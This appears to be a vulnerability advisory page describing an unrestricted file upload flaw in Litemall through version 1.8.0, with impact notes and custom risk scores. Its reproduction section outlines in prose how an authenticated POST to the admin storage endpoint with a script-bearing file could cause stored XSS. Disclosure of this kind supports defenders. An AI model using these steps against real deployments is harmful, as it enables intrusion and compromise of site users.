Primary

Context

Linlinjava Litemall Unrestricted File Upload Vulnerability in Admin Storage Controller

Vulnerability

A vulnerability allowing unrestricted file uploads has been identified in Linlinjava Litemall versions through 1.8.0. This issue resides in the AdminStorageController's 'create' function, where the 'file' parameter is not properly sanitized. As a result, attackers can upload arbitrary file types, potentially leading to stored cross-site scripting (XSS) or even remote code execution (RCE). The vulnerability can be exploited remotely.

Impact

Exploitation of this vulnerability allows for unrestricted file uploads, which can lead to stored cross-site scripting (XSS) or remote code execution (RCE) on the server.

Reproduction

To reproduce this vulnerability, send a POST request to the '/admin/storage/create' endpoint with a file that contains malicious content, such as a script tag, which could be executed later, demonstrating the stored XSS aspect. The request must include a valid 'X-Litemall-Admin-Token' for authentication.

Added: Aug 14, 2025, 4:33 PM

Updated: Aug 14, 2025, 4:33 PM

Vulnerability Rating

Custom Algorithm

spread

2.2

impact

0.0

exploitability

6.3

remediation

0.0

relevance

0.3

threat

6.4

urgency

2.9

incentive

1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.

Vulnerability Rating

Custom Algorithm

spread

2.2

impact

0.0

exploitability

6.3

remediation

0.0

relevance

0.3

threat

6.4

urgency

2.9

incentive

1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.

Linlinjava Litemall Unrestricted File Upload Vulnerability in Admin Storage Controller

Vulnerability

Impact

Reproduction

Affected Products

linlinjava litemall

CVSS Scores

References

Vulnerability Rating

Vulnerability Rating